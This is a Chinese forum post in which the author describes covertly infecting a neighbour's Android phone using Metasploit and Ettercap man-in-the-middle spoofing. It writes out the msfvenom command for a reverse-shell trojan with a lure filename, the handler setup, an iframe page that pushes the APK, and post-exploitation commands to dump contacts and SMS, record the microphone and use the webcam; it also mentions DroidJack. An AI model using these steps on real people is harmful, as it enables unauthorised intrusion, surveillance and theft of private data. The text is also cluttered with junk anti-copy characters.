找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1818|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

# i" N0 C c- Y3 p 五、msf+ettercap入侵邻居安卓手机 + {8 M7 s( }0 {: K

3 |4 U8 \$ c: a* Q: ~

% ^0 } i6 \- h' U u 首先启动msf / t6 D9 I' E" [: ~! o1 b2 F2 @

0 X! Q! \. g5 v/ P- `6 H

) M2 [- ]( ^( Y1 B, N3 a" O, y 先用kali生成一个安卓木马,如下命令: & i/ R; B9 |6 \% c$ L+ N0 s- w7 M

- x& m' x# U- P: I

/ W1 K- Y% z" S0 h Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk / c4 ~! x6 @! Y

, D8 Y4 D! @' B; f2 S6 y* S

( B* @" _3 S0 r2 M p [ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 . N! R$ m1 \- P6 `3 s

5 f9 d8 I. S! c: y/ f

) k7 g6 q( y4 P 然后进入msf 9 I, i( L# J$ D' ]- j) V8 o/ Y

" z: z' Z: U3 z3 z8 h

( E+ b/ M) Z1 q3 c5 e; H use exploit/multi/handler 2 y$ i9 ~/ `* L0 }( J. y

4 G5 y8 h, y4 [, j

' V) N; ]/ {& A set payload android/meterpreter/reverse_tcp ( G {0 [' p% c# P h$ i

9 F0 v: [- m" s1 j9 y# R

1 ]% s8 q# j) V( L( S- P set LHOST 192.168.0.109 //ipkailiip & w. p$ E: h! ^; q! ?

6 ?! o7 D3 }' i& x1 N- m7 \' l" P

; i- U2 _$ \ U& e: c set LPORT 44444 //端口一定要与前面生成的木马的端口一致 9 ~8 Q5 i( y" N! Z! J

+ K" ]6 J9 }2 Y: }! I

$ j/ k5 k7 g* e$ B Exploit 7 _- `( }, F7 O7 t& u( w

; a9 R" w6 U9 [- ^4 _$ U9 _) Z

# L! C% Y/ T' ?4 y* l   1 T" M$ q* B: X4 t6 A9 a& d8 c

8 C8 A2 _, @: G1 _7 Q2 i% k5 W

+ M6 D! [2 Z/ _0 N 下面我们开启ettercap -G 3 Q. b* r" v4 f+ x9 s( b; U5 X

c, W! g5 Y; d% c; z

! [; Q Y0 B2 ]. s# T( p* `5 a; h 我物理IP ! |) E) @; E/ o6 u4 c

2 E `* N% _+ p

; e: W8 u6 ~& j- \; D/ F" a+ y# t   # q. h& q1 _ W0 ?! P$ V, g/ _

) W# A, w- d) b g. P6 p6 L# y0 z# ]

7 O3 c5 |. h" o9 u& a, H2 _1 q 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) f9 u6 q R+ i' q4 i# v5 \

, W1 w- E6 `' d. [! y

( T) }( j# ~/ x5 F 下面我们来设置一下 9 l( I; v6 ?* j% d6 Q, H

$ }; O1 Y0 W$ K% T

6 o, @! u1 _& k; L% [   / c1 w7 z. a/ s

1 R% e$ g2 N9 x, _* @( h

! t4 U) p. G' ~ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ^8 y4 n3 `3 z" E/ {+ W1 i! o. U

. l# s1 {* Z8 j

3 V n9 d; x1 C, m   4 U# B6 y6 ]* E$ f9 U

" _$ m+ N0 M- b

$ C5 h7 F" i# n! P# O: m+ f9 k- N   . u0 O; i8 y; V+ F# o+ F9 E

: J) J# w" a, A: z, J' Y

( D% M. _7 q% d# l! G7 E7 _, U   + @: B$ {$ k. P5 c% w/ @( s

* P8 }' g% T! S; G7 b

6 T" m' K0 A7 v+ ` A   9 f6 ?4 e+ }( c3 h

; [! H; g" B$ x, `5 n

9 x5 Q, L1 r7 j! d' C7 R5 j( d7 b   2 ?4 ?) u, b$ {3 x4 S

; ~' b' `2 h8 _: e/ V/ J4 S

- h) `' U6 ^1 C4 M3 N( U( V   ! k4 U8 f9 b6 d/ O" d0 R$ B, S

* ~5 `1 b7 L1 T- S1 w6 R' _

- \7 f# G$ Z' x; B8 x$ J7 ?   9 \) U; G/ N. m1 U4 z0 R) s

$ c: y; r, v% M( `. x

+ M k1 Y8 k7 U* ]1 d   , s- O3 Y; Y/ q# |

: j7 y7 Y& p4 L% q

7 F5 W7 L, z; D W5 X3 w7 e   V# N; t, \" \0 w

( F. ]" Q" R q" z6 u: {+ J

" n6 l7 E9 `( v) G0 c4 n b   8 y' }- {1 I* m5 F- }

, A! c5 q# w* L% ^3 E" t

: ^8 m/ i; _- K6 q$ b   ; ^6 |& `9 D/ Z' H

" U. i( W7 |3 Z& O$ Y0 o" F

& P5 p* l- A, l, H1 J   6 o# b2 G# o1 @9 [4 }

3 q4 |: }+ o2 {: b, W- l/ {+ N

. W2 c8 r; u: T5 l   & }# {' R/ _, l2 v# p

# m& o& g0 |& `; H' f4 G4 v

J9 \8 {9 E: [ 下面我们开始攻击 0 [, P4 S- b5 y' a% Z ]

6 E6 Y" D1 a9 R: @, d+ l1 h

6 c7 M9 z( p* z* y+ x   4 \7 V% f$ G1 F5 R

" }, y( U% I3 k* W

: g' {" p8 k. D" N   * P- v$ r$ ?. A; g

7 {' `* H9 o( d' h; ~0 ?

) W% `- K2 I4 D( e# _9 S   $ F. K ?3 m; w4 L# V

8 {0 V- }% Q7 ?

) Y. x; `4 T9 W: t   9 Q+ |2 T* A: O

6 C, o R% f6 i6 }5 Y! h

% O& T. j. |, y/ Z   . c+ G& Z" H. v: {6 x

U: } X, ]4 C4 Y3 @

6 x, e2 k$ |8 a% P 大概过了5分钟多,发现反弹成功了 + Q) m4 j0 N, o# A3 d

% i5 d( h3 z0 I. L9 v6 F

/ f1 ?9 S1 ?7 X: C. p2 s' W   ) x1 Q' V. F7 @' c

2 h5 G$ A/ I8 o6 T+ d/ ^$ o

( |6 K* h' r+ ^! J   / }/ F) a0 V. y7 W; H/ E

% l: {3 S- ?6 i3 }# e' ^7 @( Z( @# z

0 U* A( s* L" c8 L: y   1 a! K9 i. j) K* d3 i

% i% V! }: T3 S: O; F

6 ]2 q+ l; E% c! V- W0 u* x9 x# a; ^9 U   7 B: R+ K7 t8 G7 w

, ^4 b1 i7 k0 O

( A# G& O4 d! S7 }   . I! x! q6 W* m' X

. `, `" [9 Q C( m) }- {1 P

- s; i5 t# W# k   : h& E, s! ?7 n. \4 \+ Y* x

# v5 ]4 |4 i+ l3 P# N

/ y" `' a2 K+ T) x( A   8 B2 L) |) g% k( U2 Y' i7 l: I

* o# X. l/ M6 w* c' o a

, [: }; S! B. f1 {! J `/ I 执行命令 $ t. j4 _3 G, r" Y* n# @! d7 O

% |' K, ~& H. ^8 [' Q! d1 h: q% d

; [6 f, O, ?6 a; z% ]   , Y+ L' k( U3 a2 Z0 H) X2 O

: x0 i b. z- t2 H. J/ w; b

& G6 \# ^& U* g c8 i dump_contacts    --》这个是导出电话 7 A9 o( s( k5 B% ^) B& E8 F

7 G1 q# u6 |0 c* |! I' _2 E

% C$ [8 T8 N+ k( x dump_sms --》这个是导出信息 3 Y% a! t& c/ r3 D1 j' A2 X5 Q; F% f6 u

' j! \$ r l! h, r% k, c

3 \" x+ V: H) K6 R record_mic     Record audio from the default microphone for X seconds ) H6 v5 Q7 c( F9 t) ~

- Q; U5 [' z( i2 b: }6 E6 d

) F+ d' T. W7 j0 e5 h0 P     webcam_chat    Start a video chat * u1 o& ]# E% _, x( N

; F+ F( I t: h' Q8 u. n. _

# Y& L) }! y6 v2 I8 I% Q     webcam_list    List webcams 0 _( E" n# Z T( b, A. Z A

, V1 _( W, ]8 I: k0 T4 F

& [5 f" N* |2 O     webcam_snap    Take a snapshot from the specified webcam 2 ] Z2 Q& P) O. d* `/ k

. v& u5 x7 |( J! z

8 Q; P$ \: ?) m0 e webcam_stream  lay a video stream from the specified webcam N. j6 C' b1 j3 Z u% M

+ n8 I; J* P. a% E/ a& D

; i7 `" O% k6 b   - Y+ n0 x& N0 Q

9 b. {8 w* A5 \$ f9 m5 n; P

7 G" {0 R& S: p+ ]   . v7 I) Q j* N! s! \$ W5 e

! p; Q" u* v+ b8 }/ j$ B

& b7 Y( U" @) |+ m7 r 我们打开看一下电话薄, ! H) s5 B- d' s3 _" a

6 H5 n3 [8 Q' D. i& X/ _; J1 A

, ?# [* T6 Z! F0 O& j) k   ' G4 p9 V4 i' o& C0 |

, s: L: {( j- ]- w9 q8 e. r

; ?. G! c( d+ [, Y; S   . c- k* V; ~9 r3 ~' j# z

$ T& B5 U/ p2 F

# j4 F0 k+ G' U3 \   ; i# ^3 a; y* G6 A& ~

0 X9 X: u' w$ ]" V' L' ~

+ r$ X! i% D/ M   : |" @$ e8 }! O6 b2 ~! t

2 Y9 B0 `. i5 A/ b4 B1 M

- A6 W6 d0 U" C8 w! h9 Y   3 _/ s% a B g N

; n1 X% I* N: v7 Y

( g* O3 ]7 X2 P9 a   / q* K; p6 J/ D0 f# V4 `1 u2 a) w8 q

) g, |) ]2 m$ A6 F. f: g% N5 r

' D* e" w) X1 M) T8 \8 D 我们同时欺骗成DroidJack木马,使用方法如图: ' j+ o- k3 m, S1 z

. x7 e9 k( E' m/ z' C- X0 m1 M0 d

+ W# m0 L5 W& v6 d% p& J3 z   & W7 I1 ~$ g( j2 a

4 t5 Z! b! {: {7 a5 X6 l% i4 V% C' B

2 z8 \5 q0 ?+ O* l6 z: P   % {/ X e2 y; s. S% w2 D8 A0 P

) m' F" o9 ]. N$ j; X

& `2 f# V* ~' `5 x   * T9 H+ Z7 V( }2 ]

- O! |! z5 f. ?9 ]2 s

1 v1 {$ f- p8 L; F/ h+ X) Y1 S 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 - e) W1 b0 |+ H% g1 I8 m3 T; y

0 @( E, y u6 k2 y

& K- L& L: ?4 A1 e4 x   7 D5 [) k2 q1 b+ K, e* ]

' h9 w8 D% ?0 s- d

% j0 ?5 ?$ W2 P1 V   6 `# X3 f1 y' D' Q/ j) v# E

6 }- q3 i( Q- |4 n

7 ?# X& _% L! X6 ~   , J5 d& q7 N1 U8 S# }( o

( \) f: b# p! Q- u6 M. N N# E. Z

- a0 U/ x( T5 @* o' b & H9 K- b% a0 n5 Q

4 _; T; f) K$ m" D

% G+ w1 P; c3 l0 m
4 Y. t+ K6 z) l% ], e$ `: X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表